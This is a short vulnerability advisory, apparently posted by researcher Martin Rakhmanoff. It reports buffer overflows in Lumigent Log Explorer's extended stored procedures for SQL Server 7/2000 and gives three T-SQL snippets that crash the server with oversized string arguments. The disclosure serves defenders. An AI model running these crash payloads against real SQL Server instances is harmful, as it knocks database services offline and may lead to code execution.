Lumigent Log Explorer is a transaction log explorer for Microsoft SQL Server 7/2000. It ships with extended stored procedures implemented in xp_logattach.dll. Some of them suffer from buffer overflows that lead to SQL Server service crash and potentially to arbitrary code execution. Below is sample code that crashes SQL Server: declare @bo varchar(8000) set @bo = replicate('A', 800) exec xp_logattach_StartProf @bo declare @bo varchar(8000) set @bo = replicate('A',800) exec xp_logattach_setport @bo declare @bo varchar(8000) set @bo = replicate('A',800) exec xp_logattach @bo Procedures can be run only by dbo (master) by default. Vendor was informed but I got no response confirming this problem and no fixes. Cheers Martin Rakhmanoff (jimmers) jimmers@yandex.ru